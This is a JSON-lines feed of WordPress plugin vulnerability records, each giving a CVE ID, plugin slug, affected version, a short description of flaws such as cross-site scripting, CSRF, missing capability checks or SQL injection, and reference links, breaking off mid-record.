{"CVE_ID":"CVE-2019-25140","slug":"responsive-coming-soon","versionImpact":"1.8.1","description":"The WordPress Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the logo_width, logo_height, rcsp_logo_url, home_sec_link_txt, rcsp_headline and rcsp_description parameters in versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/738c6c77-97ef-4e47-9f14-9b73ea425bc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/738c6c77-97ef-4e47-9f14-9b73ea425bc2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2121321\\\/responsive-coming-soon\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2121321\\\/responsive-coming-soon\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2123149\\\/responsive-coming-soon\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2123149\\\/responsive-coming-soon\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-in-wordpress-coming-soon-page-and-maintenance-mode-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-in-wordpress-coming-soon-page-and-maintenance-mode-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2026","slug":"image-protector","versionImpact":"1.1","description":"The Image Protector WordPress plugin through 1.1 does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b59f640-5568-42bb-87b7-36eb448db5be\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b59f640-5568-42bb-87b7-36eb448db5be\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1053","slug":"event-tickets","versionImpact":"5.8.1","description":"The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'email' action in all versions up to, and including, 5.8.1. This makes it possible for authenticated attackers, with contributor-level access and above, to email the attendees list to themselves.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7839847-2637-4a0d-bfc1-5f80b8433e24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7839847-2637-4a0d-bfc1-5f80b8433e24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038150\\\/event-tickets\\\/tags\\\/5.8.2\\\/src\\\/Tickets\\\/Commerce\\\/Reports\\\/Attendees.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038150\\\/event-tickets\\\/tags\\\/5.8.2\\\/src\\\/Tickets\\\/Commerce\\\/Reports\\\/Attendees.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1997","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'premium_fbchat_app_id' parameter of the Messenger Chat Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ffa6a6b-bbb4-4361-8585-ce2cdb7d1d7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ffa6a6b-bbb4-4361-8585-ce2cdb7d1d7e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3823","slug":"base64-encoderdecoder","versionImpact":"0.9.2","description":"The Base64 Encoder\/Decoder WordPress plugin through 0.9.2 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a138215c-4b8c-4182-978f-d21ce25070d3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a138215c-4b8c-4182-978f-d21ce25070d3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4667","slug":"blog-posts-and-category-for-elementor","versionImpact":"1.0.3","description":"The Blog, Posts and Category Filter for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post and Category Filter widget in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied 'post_types' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a24c2d7d-8df8-4a3a-a538-09e11ebc6dd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a24c2d7d-8df8-4a3a-a538-09e11ebc6dd5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-posts-and-category-for-elementor\\\/trunk\\\/widgets\\\/post-category-filter.php#L885\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-posts-and-category-for-elementor\\\/trunk\\\/widgets\\\/post-category-filter.php#L885\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog-posts-and-category-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog-posts-and-category-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6272","slug":"spider-contacts","versionImpact":"1.1.7","description":"The SpiderContacts WordPress plugin through 1.1.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/146b94df-7fc6-4da3-9ef1-d2875ae3fa9e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/146b94df-7fc6-4da3-9ef1-d2875ae3fa9e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-45269","slug":"carousel-slider","description":"WordPress plugin \"Carousel Slider\" provided by Sayful Islam contains a cross-site request forgery vulnerability on Carousel image selection feature. While logged in to the WordPress site with Carousel Slider plugin enabled, accessing a crafted page may cause a user to alter the contents of the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/sayful1\\\/carousel-slider\",\"name\":\"https:\\\/\\\/github.com\\\/sayful1\\\/carousel-slider\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/carousel-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/carousel-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN25264194\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN25264194\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6517","slug":"ds-cf7-math-captcha","versionImpact":"2.0.1","description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d04bab9c-7cb4-4d21-b70b-a4a7fabc3c20\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d04bab9c-7cb4-4d21-b70b-a4a7fabc3c20\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11355","slug":"ultimate-youtube-video-player","versionImpact":"3.3","description":"The Ultimate YouTube Video & Shorts Player With Vimeo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_setting() function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view settings for playlists.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/admin.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/admin.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/inc\\\/handler\\\/getsetting.php#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/inc\\\/handler\\\/getsetting.php#L1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4119178c-9227-4623-a962-e0f103612c75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4119178c-9227-4623-a962-e0f103612c75?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12618","slug":"newsletter2go","versionImpact":"4.0.14","description":"The Newsletter2Go plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'resetStyles' AJAX action in all versions up to, and including, 4.0.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset styles.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter2go\\\/trunk\\\/gui\\\/N2Go_Gui.php#L294\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter2go\\\/trunk\\\/gui\\\/N2Go_Gui.php#L294\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09b2d763-63ce-4cc7-aa04-589bb8697ce9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09b2d763-63ce-4cc7-aa04-589bb8697ce9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12773","slug":"altra-side-menu","versionImpact":"2.0","description":"The Altra Side Menu WordPress plugin through 2.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fab64105-599f-49a4-b01d-c873ff34b590\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fab64105-599f-49a4-b01d-c873ff34b590\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2941","slug":"drag-and-drop-multiple-file-upload-for-woocommerce","versionImpact":"1.1.4","description":"The Drag and Drop Multiple File Upload for WooCommerce plugin for WordPress is vulnerable to arbitrary file moving due to insufficient file path validation via the wc-upload-file[] parameter in all versions up to, and including, 1.1.4. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3266697%40drag-and-drop-multiple-file-upload-for-woocommerce&new=3266697%40drag-and-drop-multiple-file-upload-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3266697%40drag-and-drop-multiple-file-upload-for-woocommerce&new=3266697%40drag-and-drop-multiple-file-upload-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2685a2b4-aba3-425b-af0d-06f7693ab3d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2685a2b4-aba3-425b-af0d-06f7693ab3d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3924","slug":"peprodev-ups","description":"The PeproDev Ultimate Profile Solutions plugin for WordPress is vulnerable to unauthorized access of data via its publicly exposed reset-password endpoint. The plugin looks up the 'valid_email' value based solely on a supplied username parameter, without verifying that the requester is associated with that user account. This allows unauthenticated attackers to enumerate email addresses for any user, including administrators.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2810\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2810\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peprodev-ups\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peprodev-ups\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bb36c0f-68b3-492e-9f08-fe6228b0363f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bb36c0f-68b3-492e-9f08-fe6228b0363f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6783","slug":"wolfnet-idx-for-wordpress","versionImpact":"1.19.1","description":"The WolfNet IDX for WordPress plugin through 1.19.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5acd231b-4072-4ee1-9497-023465318608\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5acd231b-4072-4ee1-9497-023465318608\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1345","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the queue_posts function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d16fa590-1409-4f04-b8b7-0cce17412a5f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d16fa590-1409-4f04-b8b7-0cce17412a5f\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25139","slug":"responsive-coming-soon","description":"The Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to unauthenticated settings reset in versions up to, and including 1.8.1 due to missing capability checks in the ~\/functions\/data-reset-post.php file which makes it possible for unauthenticated attackers to trigger a plugin settings reset.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61fdc6e9-75ea-4226-9527-a5fd02efde70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61fdc6e9-75ea-4226-9527-a5fd02efde70?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-in-wordpress-coming-soon-page-and-maintenance-mode-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-in-wordpress-coming-soon-page-and-maintenance-mode-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2123149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2123149\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2121321\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2121321\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4703","slug":"all-in-one-b2b-for-woocommerce","versionImpact":"1.0.3","description":"The All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83278bbb-90e6-4465-a46d-60b4c703c11a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83278bbb-90e6-4465-a46d-60b4c703c11a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0903","slug":"userfeedback-lite","versionImpact":"1.0.13","description":"The User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_submitted' 'link' value in all versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in the feedback submission page that will execute when a user clicks the link, while also pressing the command key.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a649fbea-65cf-45c9-b853-2733f27518af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a649fbea-65cf-45c9-b853-2733f27518af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1996","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's IHover widget link in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48fa5f3b-000b-406e-b7ee-51af5720cf72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48fa5f3b-000b-406e-b7ee-51af5720cf72?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3822","slug":"base64-encoderdecoder","versionImpact":"0.9.2","description":"The Base64 Encoder\/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff5411b1-9e04-4e72-a502-e431d774642a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff5411b1-9e04-4e72-a502-e431d774642a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4663","slug":"osm-map-elementor","versionImpact":"1.2.2","description":"The OSM Map Widget for Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/402d0399-bc48-4740-86a4-8bf3424fb035?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/402d0399-bc48-4740-86a4-8bf3424fb035?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm-map-elementor\\\/trunk\\\/osm-map.php#L1478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm-map-elementor\\\/trunk\\\/osm-map.php#L1478\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11225","slug":"wpdm-premium-packages","versionImpact":"5.9.3","description":"The Premium Packages \u2013 Sell Digital Products Securely plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L420\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L422\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L584\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.9.3\\\/includes\\\/libs\\\/functions.php#L584\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdm-premium-packages\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdm-premium-packages\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2e847fd-0932-4d65-a201-b86e39a33588?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2e847fd-0932-4d65-a201-b86e39a33588?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12616","slug":"wp-bitly","versionImpact":"2.7.3","description":"The Bitly&#039;s WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 2.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and retrieve plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bitly\\\/trunk\\\/includes\\\/class-wp-bitly-auth.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bitly\\\/trunk\\\/includes\\\/class-wp-bitly-auth.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1312c34-45c6-41e5-b6fc-a45ac2c8a0ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1312c34-45c6-41e5-b6fc-a45ac2c8a0ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3921","slug":"peprodev-ups","description":"The PeproDev Ultimate Profile Solutions plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handel_ajax_req() function in versions 1.9.1 to 7.5.2. This makes it possible for unauthenticated attackers to update arbitrary user's metadata which can be leveraged to block an administrator from accessing their site when wp_capabilities is set to 